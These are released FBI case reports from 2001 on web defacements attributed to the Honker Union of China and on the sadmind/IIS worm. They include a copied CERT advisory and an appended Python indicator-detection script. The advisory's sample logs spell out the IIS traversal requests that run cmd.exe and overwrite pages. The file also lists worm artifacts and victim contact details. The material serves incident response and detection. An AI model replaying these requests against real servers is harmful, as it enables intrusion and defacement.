Purpose of System: Web site b7E


Highest classification of information stored in system: None 


To: Counterterrorism From: Washington Field
Re: 05/23/2001


System Data: 


Hardware/configuration (CPU): 


Operating System: Microsoft Windows NT 4.0 _ service pack 6 


Software: IIS 4.0 


Security Features: 


Access for intrusion: X- Internet connection [0 dial-up number 0 LAN (insider) 


Method: 


Security Software Installed: yes - firewall at Organization of Amer. States 


Logon -Warning Banner: no 


INTRUSION INFORMATION 


Internet address: 
Network name: 


Technique(s) used in intrusion: 


Path of intrusion: 


Subject: 


Impact: 


addresses: 1. 2: 3. 4. 5: 
country: 1. 2. Sh 4. 5: 

facility: 1. 2. 2. 4. 5. 

Age: Race: 

Sex: Education: 

Alias(s): Motive: 
Group Affiliation: 

Employer: 


Known Accomplices: 
Equipment used: 


Hardware/configuration (CPU): 
Operating System: 


Software: 


Compromise of classified information: (1 yes X no 
Estimated number of computers affected: 2 


Estimated dollar loss to date: 


less than $500.00 


b3
b7E

To: Counterterrorism From: Washington Field
Re: 05/23/2001


Category of Crime:
Impairment: Theft of Information:
[ ] Malicious code inserted [ ] Classified information compromised
[ ] Denial of service [ ] Unclassified information compromised
[ ] Destruction of information/software [ ] Passwords obtained
[ ] Modification of information/software [ ] Computer processing time obtained
[ ] Telephone services obtained
[ ] Application software obtained
[ ] Operating software obtained
Intrusion:
[X] Unauthorized access
[ ] Exceeding authorized access


REMARKS 


[Redacted] telephonically advised the Inter-American Defense
Board is a non-profit organization under the Organization of
American States. They get their T-1 and support from the
Organization of American States, but have a separate domain.

The following information was provided on the #050401 02 41307
Incident Report to NIPC and through telephonic contact with
[redacted]. The computer is located in Building 52, Room 208A, Fort
Lesley J. McNair. The intrusion occurred at 6 PM on 05/03/01.
The computer is critical to their mission. Their Web page was
defaced and the system's integrity was compromised. A remark was
left indicating the attack came from Chinese Hackers (Honker
Union of China). There was no damage to the system. Ft. McNair
Military Police were notified. The system was last updated on
05/03/01 through internal sources.

A copy of this FD-801 is being forwarded to FBI Chicago for
inclusion in their Chinese computer intrusion effort.
FEDERAL BUREAU OF INVESTIGATION

Date of transcription 06/05/2001
At the request of [redacted], the UNITED STATES b3
CAPITOL POLICE, [redacted], Legislative Computer Systems, OFFICE OF b6
THE CLERK, UNITED STATES HOUSE OF REPRESENTATIVES, furnished server
logs and web pages via Internet email to Special Agent (SA) [redacted]. b7C

Enclosed in a 1A envelope for case [redacted] is a
3.5" floppy diskette entitled, "US House of Rep. Web defacement".

Investigation on at Fairfax, Virginia
b3
File # Date dictated b6
b7C
by
b7E

This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency;
it and its contents are not to be distributed outside your agency.


(Rev. 08-28-2000)


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 06/05/2001
To: Chicago Attn:
From: Washington Field
NS-18/NVRA
Contact: SA 703-762-3456


Approved By: 
Drafted By: 


Case ID #: ending) 

Title: Subject: HACKER/HONKER UNION OF CHINA 
Victim: Illinois Secretary of State 
Type: Intrusion 
Date: 04/03/2001 


Synopsis: Lead covered. 


b3 


b7c 
Administrative: Reference May 9, 2001 email wherein Special b7E
Agent (SA) [redacted] provided SA [redacted] the logs and web pages
from victim server. Server log and web page files were
also forwarded to SA [redacted] on a 3.5" floppy diskette enclosed
in a 1A envelope.

Enclosure(s): [redacted] FD-302 with attached 1A envelope
containing one 3.5" floppy diskette.


Details: On April 30, 2001, the United States (US) HOUSE OF
REPRESENTATIVES, OFFICE OF THE CLERK'S web server suffered a
web defacement. [Redacted], Detective, US CAPITOL POLICE b6
notified the Federal Bureau of Investigation (FBI) of the b7C
intrusion. An FD-801 detailing the intrusion was completed and
forwarded to the Chicago FBI office. SA [redacted] requested
that [redacted] forward the server's log files and web pages to
[redacted] Field office. At the request of Detective [redacted],
[redacted] of the LEGISLATIVE COMPUTER SYSTEMS GROUP
forwarded the server information to SA [redacted] via Internet
email.


To: Chicago From: Washington Field
Re: 06/05/2001


LEAD (s): 
Set Lead 1: (Adm) 
CHICAGO 
AT CHICAGO 


Read and clear. 
FEDERAL BUREAU OF INVESTIGATION


Precedence: ROUTINE Date: 06/11/2001 


To: Counterterrorism Attn: Computer Investigations 
Unit, Room 5965 National 
Infrastructure Protection 
Center (NIPC) 


From: St. Louis 


Approved By:
b7C
Drafted By: b7E


Case ID #: 


Title: Subject: HONKER UNION OF CHINA; 
Victim: City of St. Louis Water Division 


Type: Computer Intrusion 
Date: June 7, 2001 


SUBMISSION: [X] Initial [ ] Supplemental [ ] Closed

CASE OPENED: 05/10/2001

CASE CLOSED: 06/11/2001 (Referred to Chicago Division)

[ ] No action due to state/local prosecution (Name/Number: )
[ ] USA declination
[ ] Referred to Another Federal Agency (Name/Number: )
[ ] Placed in unaddressed work
[X] Closed administratively
[ ] Conviction


COORDINATION: FBI Field Office St. Louis Division 
Government Agency 
Private Corporation 


VICTIM 


Company name/Government agency: City of St. Louis Water Division 
Address/location: 1640 S. Kingshighway _, St. Louis, MO 


Purpose of System: System Network for Water Division 
Highest classification of information stored in system: 


b6
b7C

To: Counterterrorism From: St. Louis
Re: Date: /2001


System Data: 
Hardware/configuration (CPUMokia IP/440 Compag Proliant Server 
Operating System: Windows NT 
Software: Checkpoint Firewall-1, Hardened Unix 


Security Features: 
Security Software Installed: x yes (identify_Checkpoint Firewalll no 
Logon Warning Banner: [1 yes x no 


INTRUSION INFORMATION 

Access for intrusion: x Internet connection 0 dial-up number O LAN (insider) 

If Internet: Internet address: 65.64.147.130 

Network name: stlwater.com 

Method: 

Technique(s) used in intrusion: web page defacement (list 
provided) 
Path of intrusion: 
addresses: 1. 202.100.26.139 2. 3.
country: 1. 2. 3.
facility: 1. 2. 3.
Subject: 

Age: Race: 

Sex: Education: 

Alias(s): Motive: 

Group Affiliation: HONKER UNION OF CHINA 

Employer: 

Known Accomplices: 

Equipment used: 

Hardware/configuration (CPU): 

Operating System: 

Software: 
Impact: 


Compromise of classified information: [ ] yes [X] no
Estimated number of computers affected: 1 


Estimated dollar loss to date: N/A 




Category of Crime:
Impairment:
[X] Malicious code inserted
[ ] Denial of service
[ ] Destruction of information/software
[X] Modification of information/software
Theft of Information:
[ ] Classified information compromised
[ ] Unclassified information compromised
[ ] Passwords obtained
[ ] Computer processing time obtained
[ ] Telephone services obtained
[ ] Application software obtained
[ ] Operating software obtained
Intrusion:
[X] Unauthorized access
[ ] Exceeding authorized access


REMARKS 


On May 7, 2001, the City of St. Louis Water Division had
its Web page defaced by the HONKER UNION OF CHINA. There was
no text printed on the black screen. Analysis of the HTML code
revealed that the following text was to be printed to the screen:
"fuck USA Government, fuck PoizonBOx, contact
sysadmcn@yahoo.com.cn".


[ ], [ ] for the Water
Division, opined that the text was not printed on the screen
because they did not use Outlook on his system. [ ]
advised that city hall's web page was also defaced with the same
HTML code, but the text was not printed to screen either, and
city hall does not use Outlook either.


[ ] used a DMZ configuration for his Checkpoint
Firewall-1 system, and the logs did not show any activity of the
HTML code passing through the system. [ ] mentioned that
his ftp was not running. [ ] requested SA [ ] to find out
if any similar incidents had been reported to the FBI. SA [ ]
telephonically contacted the STAU Unit about the logging problem and was
told that no other incidents had been reported.


[ ] provided SA [ ] with the following: a floppy
diskette containing four files (two html and two asp), a one page
log from the Checkpoint Firewall-1 system, an Internet article on
a web page defacement at University of Missouri, St. Louis (UMSL),
and an e-mail from [ ] to his supervisor about the incident.
The text message inserted in the HTML code was printed to the
screen at UMSL.
FEDERAL BUREAU OF INVESTIGATION


Precedence: ROUTINE Date: 06/11/2001 


To: Counterterrorism Attn: Computer Investigations 


Unit, Room 5965 National 
Infrastructure Protection 
Center (NIPC) 


From: St. Louis 


Approved By: [ ]
Drafted By: [ ]
b3 b6 b7C b7E


Case ID #: 

Title: Subject: HONKER UNION OF CHINA
Victim: Mary Institute and Saint Louis Country Day School 
Type: Computer Intrusion 


Date: 05/07/2001 
SUBMISSION: [X] Initial [ ] Supplemental [ ] Closed


CASE OPENED: 05/10/2001


CASE CLOSED: 06/11/2001 (Referred to Chicago Division)
[ ] No action due to state/local prosecution (Name/Number: )
[ ] USA declination
[ ] Referred to Another Federal Agency (Name/Number: )
[ ] Placed in unaddressed work
[X] Closed administratively
[ ] Conviction


COORDINATION: FBI Field Office St. Louis Division 
Government Agency 
Private Corporation 


VICTIM 


Company name/Government agency: Mary Institute and Saint Louis Country 
Day School 
Address/location: 101 N. Warson Road, St. Louis, MO 63124


Purpose of System: Support for Educational Structure 
Highest classification of information stored in system: N/A 




System Data: 
Hardware/configuration (CPU): Dell PowerEdge 4400, 733MHz, PIII 
(3)18GB hard drives, 1GB RAM 
Operating System: Windows 2000, IIS 5.0 Web Server 
Software : 


Security Features: 
Security Software Installed: [X] yes (identify: SonicWall Pro VX) [ ] no
Logon Warning Banner: [ ] yes [X] no


INTRUSION INFORMATION 


Access for intrusion: [X] Internet connection [ ] dial-up number [ ] LAN (insider)


If Internet: Internet address: 206.187.18.237 (public) 
Network name: mail.micds.org 


Method:
Technique(s) used in intrusion: _web page defacement (list 
provided) 
Path of intrusion: 
addresses: 1. 137.241.140.239 2. 210.122.218.237 3.
country: 1. 2. 3.
facility: 1. 2. 3.
Subject: 
Age: Race: 
Sex: Education: 
Alias(s): Motive:
Group Affiliation: HONKER UNION OF CHINA 
Employer: 
Known Accomplices: 
Equipment used: 
Hardware/configuration (CPU): 
Operating System: 
Software: 
Impact: 


Compromise of classified information: [ ] yes [X] no
Estimated number of computers affected:


Estimated dollar loss to date: UNK; 4 hrs. of sys admin time


Category of Crime:
Impairment:
[X] Malicious code inserted
[ ] Denial of service
[ ] Destruction of information/software
[X] Modification of information/software
Theft of Information:
[ ] Classified information compromised
[ ] Unclassified information compromised
[ ] Passwords obtained
[ ] Computer processing time obtained
[ ] Telephone services obtained
[ ] Application software obtained
[ ] Operating software obtained
Intrusion:
[X] Unauthorized access
[ ] Exceeding authorized access


REMARKS 


On May 7, 2001 and May 10, 2001, a public web server at
Mary Institute and Saint Louis Country Day School (MICDS) was
attacked. The server was running Windows 2000 Service Pack 1 and
IIS 5.0. The DNS name was mail.micds.org.

[ ], [ ] at MICDS, applied new patches to fix the problem on
5/7 and again on 5/10.

The text in the HTML code was consistent with other web
defacements. The text was "Fuck USA Government, Fuck PoizonBOx,
contact sysadmcn@yahoo.com.cn".

[ ] attempted to send e-mails to the hosts which
appeared on the logs, but all attempts at communication bounced.

[ ] was running a variety of operating systems in addition to
Win2K, to include Solaris and Linux.

[ ] was notified by the Technology Department about
the defacement on 5/7 and by the Business Department on 5/10.
[ ] deleted all the files which were modified and redirected
the web page. [ ] recreated the web page.

[ ] supplied a floppy diskette to SA [ ] with the
log activities from the attack.


FEDERAL BUREAU OF INVESTIGATION


Date of transcription 06/04/2001 


[ ], 2100 Edgeland Avenue #2, Louisville,
Kentucky 40204, cellular telephone number [ ], Social Security Account Number
[ ], was interviewed at his place of employment, Choice Systems, Inc.,
9960 Corporate Campus Drive, Suite 100, Louisville, Kentucky,
40202, telephone number 502-357-6300, extension [ ], where he is
employed as a [ ]. After being advised of the
identity of the interviewing Agent and the purpose of the
interview, [ ] provided the following information:


[ ] stated he sent all available logs of the attack
to Special Agent (SA) [ ] in Washington, D.C.
several weeks ago. [ ] explained the cost of the attack was
negligible and that it only affected Choice Systems' web server
which is their commercial site. According to the log file, the
main server was compromised on May 4, 2001 and was registered
under IP address of 208.141.14.245. The upstream Internet
provider for this server was Confluent Web Systems.


[ ] stated the other system compromised was a backup
server for the commercial server. The log file for the backup 
server indicated that the system was compromised earlier on 
February 23, 2001. The IP address of this server was 
202.97.205.4. The upstream Internet provider for this server was 
Blue Star.Net. 


[ ] concluded by stating the only way the compromise
of this attack was noticed was when the main commercial server
was attacked by the Chinese web page defacement. While restoring
the web page, the other infiltration was noticed. While
investigating this intrusion, [ ] stated one of the scripts
used referenced a site in California. [ ] stated after this
discovery, he was contacted by SA [ ].


[ ] provided the interviewing Agent with copies of
all the logs he still had in his possession. 


Investigation on 06/01/2001 at Louisville, Kentucky


Date dictated 06/04/2001 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency;
it and its contents are not to be distributed outside your agency.


FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 06/11/2001 


On June 11, 2001, Detective [ ], Oregon
State Police (OSP), 3710 Portland Road Northeast, Salem, Oregon,
provided SA [ ] the following reports, via US Mail,
related to China originated web site defacements:


1. OSP Incident Report 01227855, dated May 22, 2001, for 
victim, Construction Contractors Board.


2. OSP Incident Report 01227857, dated May 25, 2001, for 
victim, Department of Environmental Quality. Enclosed with this 
report are two floppy diskettes containing the server logs of the 
victimized machine. 


3. OSP Incident Report 01227869, dated May 23, 2001, for 
victim, Oregon State Police - ID Services. Enclosed with this 
report is one floppy diskette containing the Internet files 
believed to have been uploaded to the ID Services server. 


All original reports and diskettes are being placed into
1A envelopes, and will be furnished to Chicago for potential
prosecution.


Investigation on June 11, 2001 at Hillsboro, Oregon

Date dictated June 11, 2001

File # [ ]

by [ ]


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 
FEDERAL BUREAU OF INVESTIGATION


Precedence: ROUTINE Date: 06/11/2001 

To: Counterterrorism Attn: Computer Investigations Unit,
CIOS, NIPC
SSA [ ]
SSA [ ]
Room 11719
b3 b6 b7C b7E


From: Portland 
Squad 4 
Contact: 


Approved By 

Drafted By: 

Case ID #: 

Title: HACKER/HONKER UNION OF CHINA; 
CHICAGO SYSTEMS GROUP - VICTIM; 
INTRUSION 


Synopsis: Furnish Chicago with web defacement incident reports. 


Enclosure(s): Enclosed for Chicago is the original and one copy 
of an FD-302, for the interview of Oregon State Police (OSP) 


Detective [ ]. Also enclosed are the 1A envelopes
containing the original OSP incident reports and computer
diskettes.


Details: Pursuant to telephone calls between SA [ ] and SA
[ ], Portland is providing Chicago with reports of
the following China originated web site defacements:
On June 11, 2001, Oregon State Police (OSP) Detective
[ ] furnished Portland with 3 Incident Reports
detailing web site defacements at the following businesses:
1. Oregon Department of Environmental Quality 


2. Oregon Construction Contractors Board 


3. OSP ~ ID Services 




Detective [ ] also furnished computer diskettes
containing data from the compromised machines. 


Portland will continue to provide Chicago with China 
based web site defacement reports, as they are received. 
FEDERAL BUREAU OF INVESTIGATION
Precedence: ROUTINE Date: 05/31/2001 
To: Chicago Attn: SA [ ]
    Philadelphia
b6 b7C
From: Philadelphia
Squad 9
Contact: SA [ ] 215-418-4313
Approved By: 
Drafted By: 
Case ID #: 
(Pending) 
Title: Honkers Union of China; 
Chicago Systems Group- Victim; 
Intrusion- Other 
Synopsis: Claim statistical accomplishments. 
Details: Philadelphia FBI has received several complaints and
has identified the following victims concerning the above
captioned Chicago investigation. Below is a list of victims of
the web defacement attack identified in the Philadelphia FBI
territory since May 18, 2001:
1.) MAC DIRECT c/o [ ]
185 Discovery Drive
[ ], PA 18915
[ ] (cell)

2.) MORAVIAN COLLEGE c/o [ ]
120 West Greenwich Street
Bethlehem, PA 18018

3.) PALISADES SCHOOL DISTRICT c/o [ ]
39 Thomas Free Drive
Kintnersville, PA 18930
(610) 847-5131 ext. [ ]

4.) SOLUTION SYSTEMS INC. c/o [ ]
114 Forest Avenue
Narberth, PA 19072

5.) CONCORDE INC. c/o [ ]
1835 Market Street
12th Floor
Philadelphia, PA 19103

6.) UNIGLOBE/WINGS TRAVEL c/o [ ]
6198 Butler Pike
[ ]

7.) weutRowzes Inc. c/o [ ]

8.) TOPLINK INC. c/o [ ]
103 East Pennsylvania Blvd.
Feasterville, PA 19053

9.) CRW GRAPHICS INC. c/o [ ]
9100 Pennsauken Highway
Pennsauken, NJ 08110

10.) DILWORTH PAXSON, LLP c/o [ ]
1735 Market Street
Philadelphia, PA 19103

11.) LANCASTER GENERAL HOSPITAL c/o [ ]

12.) PHILADELPHIA UNIVERSITY c/o [ ]

13.) VILLAGEAUCTION.COM c/o [ ]
200 Innovation Blvd.
[ ] Park, PA 16803

14.) CIBER c/o [ ]
650 Wilson Lane
[ ], PA 17055

15.) PointAll Corporation c/o [ ]
950 Tilton Road
Northfield, NJ 08225
(609) 641-7500 ext. [ ]

16.) [ ]s Solutions, Inc. c/o [ ]
710 Floral Vale Blvd
[ ], PA [ ]

17.) Prince Law Offices c/o [ ]
42 South 5th Street
Reading, PA 19602
(610) 375-8425

18.) Miller's Capital Insurance c/o [ ]
805 North Front Street

19.) Deloitte Consulting Group c/o [ ]
3600 Vartan Way
Harrisburg, PA 17110
(717) 651-2858 ext [ ]

20.) APR Supply Company c/o [ ]
305 North 5th Street
Lebanon, PA 17022

21.) Commonwealth of Pennsylvania c/o [ ]
Commonwealth Technology Center
1 Technology Park
[ ], PA

22.) Na[ ] Depot ([ ] Criminal Investigative Service)

23.) Pennsylvania State University c/o [ ]
Harrisburg Campus
Harrisburg, PA

24.) Strafford Mechanical, Inc. c/o [ ]
37 Industrial Blvd.
Paoli, PA 19301

25.) Adis International Inc. c/o [ ]
820 Town Center Drive
Langhorne, PA 19047

b3 b6 b7C b7E


Accomplishment Information: 


Number: 25 
Type: NIPCIP VICTIM CONTACTED / INTERVIEWED 
ITU: NIPCIP 


Claimed By: 
Name: 
Squad: 9 

LEAD (s) : 


Set Lead 1:
CHICAGO 


AT CHICAGO, ILLINOIS


For information purposes. Read and clear. 


Set Lead 2: 
PHILADELPHIA 
, AT PHILADELPHIA, PENNSYLVANIA 
Read and clear. 
FEDERAL BUREAU OF INVESTIGATION


Precedence: ROUTINE Date: 05/31/2001 


To: Counterterrorism Attn: Computer Investigations 
Unit, Room 5965 
Computer Investigations 
and Infrastructure Threat 
Assessment Center 


(CID/NSD) 
From: SAC, Seattle 
Squad 11 
Contact: IOS [ ] (208) 262-2438


b7C b7E
Approved By: [ ]
Drafted By: [ ]
Case ID #: [ ]
Title: Subject: UNSUB;
Victim: LUMMI INDIAN BUSINESS COUNCIL;
Type: SADMIND/IIS WORM;
Date: 05/14/01
SUBMISSION: [X] Initial [ ] Supplemental [ ] Closed
CASE OPENED: 05/31/01
CASE CLOSED:
[ ] No action due to state/local prosecution (Name/Number: )
[ ] USA declination
[ ] Referred to Another Federal Agency (Name/Number: )
[X] Placed in unaddressed work
[ ] Closed administratively
[ ] Conviction
COORDINATION: FBI Field Office Chicago 
Government Agency 
Private Corporation 
VICTIM 
Company name/Government agency: [ ]
Address/location: 2616 Kwina Road
Bellingham, WA 98226


Purpose of System: Web Site 
Highest classification of information stored in system: Unclass. 




System Data: 
Hardware/configuration (CPU): 


Operating System: Windows NT/Service Pack 6 with IIS


Software: 


Security Features: 
Security Software Installed: [X] yes (if yes, type) [ ] no
Symantec Norton Anti Virus Software
Logon Warning Banner: [ ] yes [ ] no


INTRUSION INFORMATION 


Access for intrusion: [X] Internet connection [ ] dial-up number [ ] LAN (insider)
If Internet: 169.203.16.2 (Lummi Nation IP address)


Network name: 
Method: 
Path of intrusion: 
addresses: 1. 207.71.87.60 


country: 1. USA 
facility: 1. Verio, Inc 


Subject: UNSUB 


Age: Race: 

Sex: Education: 
Alias(s): Motive: 
Group Affiliation: 

Employer: 


Known Accomplices: 

Equipment used: 
Hardware/configuration 
Operating System: 
Software: 


Impact: 
Compromise of classified information: [ ] yes [X] no
Estimated number of computers affected: 1


Estimated dollar loss to date: $400.00 (wages paid to [ ])


Category of Crime:
Impairment:
[X] Malicious code inserted
[ ] Denial of service
[X] Destruction of information/software
[X] Modification of information/software
Theft of Information:
[ ] Classified information compromised
[ ] Unclassified information compromised
[ ] Passwords obtained
[ ] Computer processing time obtained
[ ] Telephone services obtained
[ ] Application software obtained
[ ] Operating software obtained
Intrusion:
[X] Unauthorized access
[ ] Exceeding authorized access


REMARKS 


On May 14, 2001, the Federal Bureau of Investigation (FBI) Seattle,
Washington, office received a copy of NIPC Cyber Intrusion Report 051901 004
42062 reporting the defacement of the web site of [ ],
2616 Kwina Road, Bellingham, Washington, 98226, telephone
number [ ]. On May 14, 2001, from 22:37:06 - 22:38:02, the Lummi
Nation's web server was infected with the sadmind/IIS worm. The attacker
originated from Internet Protocol (IP) address 207.71.87.60 via spoofed DNS
server 208.151.126.140.


On May 30, 2001, FBI Intelligence Operations Specialist (IOS) [ ]
conducted a web site [ ] and telephonically
contacted [ ] at his place of business regarding the
complaint. After being advised of the identity of the interviewing IOS and
the nature of the interview, [ ] provided the following information:


On May 7, 2001, an unsuccessful attempt was made by an unknown
intruder to infect the Lummi Nation's web server with the sadmind/IIS worm.
On May 14, 2001, the Lummi Nation's web server was successfully infected
with the worm as evidenced by the content on their web site (IP address
169.203.16.2) being replaced with derogatory verbiage directed against the
United States Government. [ ] said that he obtained some information
about the worm from the cert.org web site but was frustrated that CERT did


not have information on how to remove the worm from infected machines.


[ ] sent an e-mail message to the [ ] at Verio advising
Verio of the compromise (Verio is the registrant for the Solaris machine
used to send the sadmind/IIS worm).


The Lummi Nation's web server runs Windows NT 4.0/Service Pack 6 with
IIS as its operating system and Symantec as its anti-virus protection. The
Lummi Business Council has purchased firewall protection but [ ] has not
yet installed the software on their machines. [ ] said that an analysis
of the infected server revealed that some files had been modified and that
the system was only allowing outgoing traffic through ports 80 and 443. The
worm overwrote the compromised web server's access tables, consequently only
allowing access to the Internet via protocol 6. [ ] spent approximately
two days recovering from the May 14, 2001, compromise and several hours
blocking the May 7, 2001, attempted compromise.


On May 31, 2001, IOS [ ] located CERT Advisory CA-2001-11
sadmind/IIS Worm, original release date May 08, 2001, on the www.cert.org web
site. According to information provided in the advisory, the sadmind/IIS
worm is a self-propagating malicious code that uses two well known 
vulnerabilities to deface web pages. Based on preliminary analysis, the 
sadmind/IIS worm exploits a vulnerability in Solaris systems and 
subsequently installs software to attack Microsoft IIS web servers. In 
addition, the worm includes a component to propagate itself automatically to 
other vulnerable Solaris systems. It will add "+ +" to the .rhosts file in 
the root user's home directory. Finally, the worm will modify the 
index.html on the host Solaris System after compromising 2,000 IIS systems. 
Microsoft IIS servers that are successfully compromised exhibit the modified 
web pages that read as follows: 

fuck USA Government 
fuck PoizonBOx 


contact :sysadmcn@yahoo.com.cn 


Lummi Nation

"Related by family, culture, and history"
The Lummi Nation is located adjacent to Whatcom County, in the northwest corner of Washington 
State. Lummi is 8 miles west of the city of Bellingham, and 100 miles north of Seattle. 

Although Lummi is 20 miles south of the U.S.-Canadian border, there is no border for Native 
Americans related by family, culture, and history. The reservation occupies over 12,500 acres of land 
on two peninsulas. The tribe holds 8,000 acres of Puget Sound tidelands surrounding the reservation. 


Size: 12,500 Acres 
8,000 Acres Tidelands 
Strait of Georgia


Usual and Accustomed Fishing Area: 


Canadian border to Seattle 


Economic Development: Salmon and shellfish 
hatcheries, seafood processing plant, convenience store, 
marina, foreign trade zone. 


Education: Head Start, Elementary, Junior (Middle) 
School, High School, and Northwest Indian College. 


Natural Resources: Salmon, Crab, Clams, Oysters, 
Herring, Forestry, Agricultural Land, Ground and 
Surface Water, Tribal Tidelands


Government: Self-Governance Tribe under an 11 
member Lummi Indian Business Council elected by a 
General Council of all enrolled members. 


CERT® Advisory CA-2001-11 sadmind/IIS Worm


Original release date: May 08, 2001 
Last revised: May 10, 2001 
Source: CERT/CC 


A complete revision history is at the end of this file. 


Systems Affected 


* Systems running unpatched versions of Microsoft IIS
* Systems running unpatched versions of Solaris up to, and including, Solaris 7


Overview 


The CERT/CC has received reports of a new piece of self-propagating malicious code (referred to here as the sadmind/IIS worm). The
worm uses two well-known vulnerabilities to compromise systems and deface web pages.


I. Description 


Based on preliminary analysis, the sadmind/IIS worm exploits a vulnerability in Solaris systems and subsequently installs software to attack
Microsoft IIS web servers. In addition, it includes a component to propagate itself automatically to other vulnerable Solaris systems. It will
add "+ +" to the .rhosts file in the root user's home directory. Finally, it will modify the index.html on the host Solaris system after
compromising 2,000 IIS systems.


To compromise the Solaris systems, the worm takes advantage of a two-year-old buffer overflow vulnerability in the Solstice sadmind
program. For more information on this vulnerability, see


http://www.kb.cert.org/vuls/id/28934
http://www.cert.org/advisories/CA-1999-16.html


After successfully compromising the Solaris systems, it uses a seven-month-old vulnerability to compromise the IIS systems. For additional
information about this vulnerability, see


http://www.kb.cert.org/vuls/id/111677


Solaris systems that are successfully compromised via the worm exhibit the following characteristics:


* Sample syslog entry from compromised Solaris system


May 7 02:40:01 carrier.example.com inetd[139]: /usr/sbin/sadmind: Bus Error - core dumped
May 7 02:40:01 carrier.example.com last message repeated 1 time
May 7 02:40:03 carrier.example.com last message repeated 1 time
May 7 02:40:06 carrier.example.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault - core dumped
May 7 02:40:03 carrier.example.com last message repeated 1 time
May 7 02:40:06 carrier.example.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault - core dumped
May 7 02:40:08 carrier.example.com inetd[139]: /usr/sbin/sadmind: Hangup
May 7 02:40:08 carrier.example.com last message repeated 1 time
May 7 02:44:14 carrier.example.com inetd[139]: /usr/sbin/sadmind: Killed
* A rootshell listening on TCP port 600
* Existence of the directories
  o /dev/cub contains logs of compromised machines
  o /dev/cuc contains tools that the worm uses to operate and propagate
* Running processes of the scripts associated with the worm, such as the following:
  o /bin/sh /dev/cuc/sadmin.sh
  o /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 111
  o /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 80
  o /bin/sh /dev/cuc/uniattack.sh
  o /bin/sh /dev/cuc/time.sh
  o /usr/sbin/inetd -s /tmp/.f
  o /bin/sleep 300

Microsoft IIS servers that are successfully compromised exhibit the following characteristics:


* Modified web pages that read as follows:


fuck USA Government
fuck PoizonBOx
contact: sysadmcn@yahoo.com.cn


* Sample Log from Attacked IIS Server


2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/root.exe /c+echo+<HTML code inserted here>.././index.asp 502 -
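The requests in the advisory's IIS log sample above (the same sequence the Seattle report's remarks summarise) are the whole compromise: a directory-traversal probe to cmd.exe, a copy of cmd.exe to root.exe inside the web root, and an echo that overwrites index.asp. The script below is an added example, not part of the FBI file or of the CERT advisory. It turns that sequence into detection logic over IIS W3C log lines and checks the Solaris-side artifacts the advisory lists (sadmind core dumps, processes under /dev/cuc, the root shell on TCP 600, "+ +" in root's .rhosts). Every sample log, ps, netstat and .rhosts line in it is constructed for the example, and the handling of the %c0%af and %c1%9c overlong escapes comes from MS00-078, not from anything quoted in this file.

```python
"""sadmind/IIS worm indicator checks (added example; constructed data)."""
from __future__ import annotations

import re
from urllib.parse import unquote_to_bytes

# Overlong UTF-8 sequences that unpatched IIS 4/5 decoded as path separators
# after the /scripts/ mapping check had already passed (VU#111677, MS00-078).
# The advisory's sample log shows the already-decoded form; raw requests
# usually carry these escapes, so decode before matching.
OVERLONG_SEPARATORS = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\"}

# Column order of the W3C log lines quoted in the advisory.
IIS_FIELDS = ("date", "time", "c_ip", "cs_username", "s_ip", "s_port",
              "cs_method", "cs_uri_stem", "cs_uri_query", "sc_status")


def normalize_uri(part: str) -> str:
    """URL-decode a stem or query, map overlong separators to '/', fold
    backslashes, lowercase: '..%c0%af..' and '../..' then compare equal."""
    raw = unquote_to_bytes(part)
    for seq, rep in OVERLONG_SEPARATORS.items():
        raw = raw.replace(seq, rep)
    return raw.decode("latin-1").replace("\\", "/").lower()


def classify_request(rec: dict[str, str]) -> str | None:
    """Map one request to a worm stage, or None if it looks benign.
    The advisory's copy and echo requests were logged with status 502 even
    though the commands ran, so status codes are deliberately ignored."""
    stem = normalize_uri(rec["cs_uri_stem"])
    query = normalize_uri(rec["cs_uri_query"])
    if "/../" in stem and stem.endswith("cmd.exe"):
        if "copy" in query and "root.exe" in query:
            return "stage2_copy_cmd_to_root.exe"
        return "stage1_traversal_to_cmd.exe"
    if stem.endswith("root.exe"):
        if "echo" in query and "index.asp" in query:
            return "stage3_deface_write"
        return "stage3_root.exe_use"
    return None


def scan_iis_log(text: str) -> dict[str, list[str]]:
    """Return {client_ip: [stages in log order]} for worm-like requests."""
    findings: dict[str, list[str]] = {}
    for line in text.splitlines():
        parts = line.split()
        if not parts or line.startswith("#") or len(parts) < len(IIS_FIELDS):
            continue
        rec = dict(zip(IIS_FIELDS, parts))
        stage = classify_request(rec)
        if stage:
            findings.setdefault(rec["c_ip"], []).append(stage)
    return findings


SADMIND_CRASH = re.compile(
    r"inetd\[\d+\]: /usr/sbin/sadmind: (?:Bus Error|Segmentation Fault) - core dumped")
WORM_PROCESS_MARKERS = ("/dev/cuc/", "/usr/sbin/inetd -s /tmp/.f")


def solaris_indicators(syslog: str, ps: str, netstat: str, rhosts: str) -> list[str]:
    """Check the Solaris artifacts the advisory lists for a compromised host."""
    found: list[str] = []
    crashes = len(SADMIND_CRASH.findall(syslog))
    if crashes:  # repeated sadmind core dumps = overflow attempts (CA-1999-16)
        found.append(f"sadmind core dumped {crashes}x (overflow attempts)")
    for line in ps.splitlines():
        if any(m in line for m in WORM_PROCESS_MARKERS):
            found.append("worm process: " + line.split(None, 3)[-1])
    if re.search(r"\*\.600\s.*\bLISTEN\b", netstat):
        found.append("listener on TCP 600 (worm root shell)")
    if any(l.strip() == "+ +" for l in rhosts.splitlines()):
        found.append("root .rhosts contains '+ +' (trusts every host and user)")
    return found


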